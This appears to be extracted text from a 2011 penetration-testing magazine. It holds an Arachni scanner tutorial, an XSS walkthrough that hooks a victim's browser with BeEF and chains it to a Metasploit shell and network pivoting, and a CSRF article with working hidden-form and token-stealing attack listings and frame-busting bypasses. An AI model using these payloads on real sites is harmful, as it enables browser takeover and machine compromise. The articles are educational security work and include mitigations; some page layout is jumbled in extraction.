At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML, thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
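The extraction side of such a parser can be approximated with a couple of regular expressions. The Ruby sketch below is a rough stand-in for the idea, not Arachni's actual implementation; as noted, Arachni relies on Nokogiri for the hard cases that regexes mishandle.

```ruby
# Naive extraction of link targets and form actions from an HTML page.
# Good enough for well-formed markup; a real crawler needs a full parser.
def extract_links(html)
  html.scan(/<a[^>]+href=["']([^"']+)["']/i).flatten.uniq
end

def extract_form_actions(html)
  html.scan(/<form[^>]+action=["']([^"']+)["']/i).flatten.uniq
end
```

A crawler would feed each extracted link back into its fetch queue, applying the redundancy filters and link-count limits described above.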
Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of audit modules and reconnaissance (recon) modules; Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization and the Metareport, providing Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni; Table 2 provides an overview of currently available plug-ins.
Installation

Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3, some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org/ and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update RubyGems and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands of Listing 2 in the Cygwin shell (note: these are the same commands as with the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues were detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks...
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line interface and the GUI. First the command line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
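The include-then-exclude resolution described above can be mimicked with shell-style patterns. This is a hedged Python sketch of the idea; the module names and the resolution logic are illustrative, not Arachni's actual option parser:

```python
from fnmatch import fnmatch

# Hypothetical module names, for illustration only.
MODULES = ['xss', 'xss_event', 'xss_path', 'sqli', 'csrf', 'common_directories']

def select_modules(available, spec):
    # Resolve an Arachni-style --mods value such as '*,-xss_*':
    # plain patterns include matching modules, '-' patterns exclude them.
    selected = []
    for pat in spec.split(','):
        pat = pat.strip()
        if pat.startswith('-'):
            selected = [m for m in selected if not fnmatch(m, pat[1:])]
        elif pat:
            selected += [m for m in available
                         if fnmatch(m, pat) and m not in selected]
    return selected
```

With the hypothetical list above, select_modules(MODULES, '*,-xss_*') drops xss_event and xss_path while keeping the rest.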
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) do |file|
            @@__directories << file unless file.include?( '.' )
        end
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each do |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) do |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            end
        end

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces or confidential
                    information are exposed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can easily be extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories, audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as shown in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
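Stripped of the Arachni framework plumbing, the module boils down to a forced-browsing loop: filter file-like entries out of the wordlist, probe each candidate directory, and record the hits. A hedged Python sketch of that loop follows; the function names and the injected fetch callback are my own, not Arachni's API:

```python
def load_wordlist(text):
    # Keep only directory names; like the module, skip entries
    # containing a dot, which look like file names.
    return [line.strip() for line in text.splitlines()
            if line.strip() and '.' not in line]

def forced_browse(base_url, directories, fetch):
    # Probe each candidate directory and report those that exist.
    # `fetch` is injected (e.g. a wrapper around an HTTP client)
    # and must return the HTTP status code for a URL.
    found = []
    for d in directories:
        url = base_url.rstrip('/') + '/' + d + '/'
        if fetch(url) == 200:
            found.append(url)
    return found
```

Injecting the fetch callback keeps the scanning logic testable without a live target.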
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman by email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. The user enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot clarifies the above steps (Figure 1).
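The same reflection flaw can be simulated outside PHP. In this Python sketch, vulnerable_search mimics the page above by echoing input verbatim, while safe_search shows the encoded variant; the helper names are mine, for illustration only:

```python
import html

# The classic proof-of-concept payload from the article.
payload = "<script>alert(document.domain)</script>"

def vulnerable_search(query):
    # Mimics the PHP page: user input echoed verbatim into the response.
    return "The parameter passed is " + query

def safe_search(query):
    # The same response with HTML entity encoding applied on output.
    return "The parameter passed is " + html.escape(query)
```

vulnerable_search(payload) returns the payload as live markup, whereas safe_search(payload) renders it as inert text.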
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins in the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins in the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output, as in a), must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
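The second and third points can be sketched as a pair of helpers: encode on output no matter what, and optionally whitelist input characters. The whitelist below is an illustrative assumption (what is acceptable depends on the field), and html.escape stands in for a context-aware encoder such as those described in the OWASP cheat sheet:

```python
import html
import re

# Illustrative whitelist for a search field: word characters,
# spaces and basic punctuation only.
WHITELIST = re.compile(r'[\w .,-]*')

def accept_input(value):
    # Input-side filtering: reject anything outside the whitelist.
    return bool(WHITELIST.fullmatch(value))

def render(value):
    # Output-side encoding: applied regardless of input filtering
    # (defence in depth).
    return "The parameter passed is " + html.escape(value, quote=True)
```

Encoding on output is the primary control; input filtering is a complementary layer, not a replacement.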
Conclusion
In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of a user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an information security professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com" style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1. HTML code used to bypass the protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame" method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit()</script>
</div>
index.php (victim website)
And the webpage which processes the request stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.
index.php (evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
The mechanism of one-time tokens is usually subverted by brute-force attacks. Brute-force attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
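For contrast with the md5(uniqid(rand(), TRUE)) recipe above, here is a hedged Python sketch of the same round trip using a cryptographically secure generator and a constant-time comparison; the function names and the dict-backed session are illustrative:

```python
import hmac
import secrets

def issue_token(session):
    # Generate a one-time token from a CSPRNG and store it server-side.
    session['token'] = secrets.token_hex(16)   # 128 bits of randomness
    return session['token']

def check_token(session, submitted):
    # Consume the token (one-time use) and compare in constant time,
    # which also thwarts timing-based guessing.
    expected = session.pop('token', None)
    return expected is not None and hmac.compare_digest(expected, submitted)
```

Popping the token on verification makes it genuinely one-time: a replayed request fails even if it carries the correct value.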
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message . "\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker views the framed webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38, http://pentestmag.com, 01/2011 (1) November
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

